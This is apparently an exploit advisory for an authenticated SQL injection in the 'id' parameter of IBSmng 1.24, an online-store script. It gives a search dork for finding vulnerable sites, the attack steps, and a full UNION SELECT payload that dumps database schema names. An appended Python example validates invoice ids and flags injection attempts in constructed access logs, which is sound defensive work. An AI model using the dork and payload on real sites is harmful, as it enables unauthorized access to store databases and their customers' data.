# Exploit Title: IBSmng 1.24 - 'id' SQL Injection (Authenticated)
# Dork: inurl:index.php inurl:group= inurl:mode=auto
# Date: 2020-08-02
# Exploit Author: Ultra Security Team
# Team Members: Ashkan Moghaddas, AmirMohammad Safari, Behzad khalife, Milad Ranjbar
# Vendor Homepage: IBSmng.ir
# Tested on: Windows/Linux
# Version: 1.24 [Final Version]
.:: Script Description ::.
This Script Is Used To Manage Your Online Store.
.:: Proof Of Concept (PoC) ::.
Step 1 - Find Your Target With the above Dork.
Step 2 - Create An Account.
Step 3 - Login To Your Account.
Step 4 - Click On Buy Services.
Step 5 - Inject Your Payload in the 'id' Parameter.
.:: Sample Request ::.
localhost/user/index.php?Req=invoice&id=-194732'+UNION+ALL+SELECT+(SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x),2,3,4,5,6,7,8,9,10,11,12%23
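
.:: Detection / Input Validation (added example) ::.
The following Python code is an added example, not part of the original advisory and not IBSmng code. It applies an allow-list check to the 'id' parameter and scans access-log lines for Req=invoice requests whose id is not a plain integer. Assumptions: valid invoice ids are positive integers, logs use the combined access-log format, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate invoice id is a plain positive integer.
VALID_ID_RE = re.compile(r"[0-9]{1,18}")

def invoice_id_is_valid(value):
    """Allow-list check a server-side handler can apply before querying."""
    return VALID_ID_RE.fullmatch(value) is not None

def suspicious_invoice_requests(log_lines):
    """Return (line_number, decoded_id) for Req=invoice hits with a non-numeric id."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs percent-decodes values and turns '+' into a space.
        params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "invoice" not in params.get("Req", []):
            continue
        # Check every occurrence so a repeated 'id' parameter cannot hide a bad value.
        for value in params.get("id", []):
            if not invoice_id_is_valid(value):
                findings.append((number, value))
    return findings

# Constructed sample access-log lines (not captured from a real system).
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Aug/2020:10:00:01 +0000] "GET /user/index.php?Req=invoice&id=194732 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [02/Aug/2020:10:00:05 +0000] "GET /user/index.php?Req=invoice&id=-194732\'+UNION+ALL+SELECT+1,2,3%23 HTTP/1.1" 200 9841',
    '203.0.113.7 - - [02/Aug/2020:10:00:09 +0000] "GET /user/index.php?Req=profile&id=abc HTTP/1.1" 200 2210',
    '203.0.113.9 - - [02/Aug/2020:10:00:12 +0000] "GET /user/index.php?Req=invoice HTTP/1.1" 200 1033',
]

if __name__ == "__main__":
    for number, value in suspicious_invoice_requests(SAMPLE_LOG):
        print(f"line {number}: suspicious id={value!r}")
```

The same allow-list check belongs in the invoice handler itself, together with a parameterized query, so that a non-numeric id is rejected before it reaches the database.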